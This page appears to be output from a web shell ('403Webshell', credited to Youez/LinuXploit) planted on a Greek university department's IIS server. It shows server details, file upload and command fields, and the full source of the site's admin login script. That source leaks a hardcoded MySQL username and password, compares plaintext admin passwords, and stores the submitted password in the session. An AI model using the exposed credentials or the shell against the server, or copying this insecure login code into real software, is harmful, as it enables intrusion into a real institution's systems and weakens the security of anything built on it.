403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.216.231
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/icd/labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/icd/labs/checking_admin.php
<?php
	/*
	*************************************************************************************
	**	checking_admin.php
	*************************************************************************************
	*/

	session_start();					// Εκκίνηση session.
	header("Cache-control: private");	// Διόρθωση σφάλματος "cache control" για τον IE6. 

	/*
	*************************************************************************************
	**	Έλεγχος ασφάλειας. Ελέγχεται για το εάν ο χρήστης ήρθε στη σελίδα αυτή μέσω μίας 
	**  αίτησης post (admin_login.php) ή προσπαθεί να προσπελάσει τη σελίδα απ'ευθείας και 
	**  ταυτόχρονα να προσπελάσει και τους μηχανισμούς ασφαλείας του συστήματος.
	*************************************************************************************
	*/

	if((!$_POST[username]) || (!$_POST[password]))	 
	{
	
	/*
	*************************************************************************************
	**	Έναρξη html κώδικα για την περίπτωση που ο χρήστης δεν έχει κάνει post  δεδομένα
	**  από την admin_login.php και εμφάνιση μηνύματος σφάλματος. Μετά από 7 δευτερόλεπτα ο 
	**  χρήστης ανακατευθύνεται στην αρχική σελίδα.
	*************************************************************************************
	*/
?>

  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  <html>
  <head>
  <title>E-LABS - ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ, ΥΠΟΛΟΓΙΣΤΩΝ ΚΑΙ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ - ΔΙΠΑΕ</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7">
  <META HTTP-EQUIV="Refresh" CONTENT="7; URL=index.php">
  <style type="text/css">
  <!--
  body {
	background-image: url(pics/back.gif);
  }
  -->
  </style></head>

  <body>
  <table width="1000" border="0" cellpadding="0" cellspacing="0">
  <!--DWLayoutTable-->
  <tr>
    <td height="150" colspan="3" valign="top"><img src="pics/index_up.jpg" width="1000" height="150"></td>
    <td width="4">&nbsp;</td>
  </tr>
  <tr>
    <td width="55" height="119">&nbsp;</td>
    <td width="826" valign="top">

<?php
	print "Τα δεδομένα που καταχωρήσατε δεν είναι σωστά. Σε λίγα δευτορόλεπτα θα μεταβείτε αυτόματα στην αρχική σελίδα για να προσπαθήσετε να επανασυνδεθείτε.";
	exit;
 ?>

  </td>
  <td width="119">&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="496">&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
</table>
  </body>
  </html>

<?php  
	}
	else
	{

	/*
	*************************************************************************************
	**	Αν ο χρήστης προσπάθησε να προσπελάσει την σελίδα με νόμιμο τρόπο (δηλαδή με post
	**  των δεδομένων του από την αρχική σελίδα) τότε έχουν γίνει post το username και το
	**  password. Επομένως αυτά πρέπει να ελεγχθούν.
	*************************************************************************************
	*/
		$connection = mysqli_connect("localhost", "icd_labs", "t3!$3r") or die(mysqli_error());
		mysqli_select_db($connection,"laboratories") or die(mysqli_error());

		mysqli_query($connection,"SET NAMES 'greek'");

/*
		mysqli_query($connection,"set names greek");
*/

/*
mysqli_set_charset('greek_general_ci');
*/
 
		$sql = "SELECT username, password FROM admin WHERE id = 1 ";

		$result = mysqli_query($connection,$sql) or die(mysqli_error());

		$row = mysqli_fetch_array($result,MYSQLI_ASSOC);

		$user_admin = $row[username];

		$pass_admin = $row[password];


		$_SESSION['username'] = $_POST['username'];
		$_SESSION['password'] = $_POST['password']; 
		$username = $_SESSION['username'];
		$password = $_SESSION['password'];

	/*
	*************************************************************************************
	**  Έλεγχος για το εάν ο χρήστης είναι ο διαχειριστής του συστήματος και μεταφορά του 
	**  στη σελίδα admin.php.
	*************************************************************************************
	*/
	
		if( $_SESSION['username'] == $user_admin && $_SESSION['password'] == $pass_admin)
		{
?>

  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  <html>
  <head>
  <title>E-LABS - ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ, ΥΠΟΛΟΓΙΣΤΩΝ ΚΑΙ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ - ΔΙΠΑΕ</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7">
  <META HTTP-EQUIV="Refresh" CONTENT="1; URL=admin.php">
  </head>
  
  <body>
  
  </body>
  </html>

<?php   
			}
			else
			{
	/*
	*************************************************************************************
	**  Αν τίποτα από τα παραπάνω δεν ισχύει τότε ο χρήστης έχει δώσει λάθος δεδομένα (
	**  είτε λάθος username είτε λάθος password) και επομένως πρέπει να του εμφανιστεί
	**  ένα μήνυμα σφάλματος. Έπειτα ανακατευθύνεται στην αρχική σελίδα ώστε να προσπα-
	**  θήσει να επανασυνδεθεί.
	*************************************************************************************
	*/
?>

  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  <html>
  <head>
  <title>E-LABS - ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ, ΥΠΟΛΟΓΙΣΤΩΝ ΚΑΙ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ - ΔΙΠΑΕ</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7">
  <META HTTP-EQUIV="Refresh" CONTENT="7; URL=admin_login.php">
  <style type="text/css">
  <!--
  body {
	background-image: url(pics/back.gif);
  }
  -->
  </style></head>

  <body>
  <table width="1000" border="0" cellpadding="0" cellspacing="0">
  <!--DWLayoutTable-->
  <tr>
    <td height="150" colspan="3" valign="top"><img src="pics/index_up.jpg" width="1000" height="150"></td>
    <td width="4">&nbsp;</td>
  </tr>
  <tr>
    <td width="55" height="119">&nbsp;</td>
    <td width="826" valign="top">

<?php
	print "Τα δεδομένα που καταχωρήσατε δεν είναι σωστά. Σε λίγα δευτορόλεπτα θα μεταβείτε αυτόματα στην προηγούμενη σελίδα για να προσπαθήσετε να επανασυνδεθείτε.";

	exit;
?>

 </td>
  <td width="119">&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="496">&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
</table>
  </body>
  </html>
<?php  
		}
	}
	/*
	*************************************************************************************
	**	Developed by Petrellis Manolis.
	*************************************************************************************
	*/
?> 

Youez - 2016 - github.com/yon3zu
LinuXploit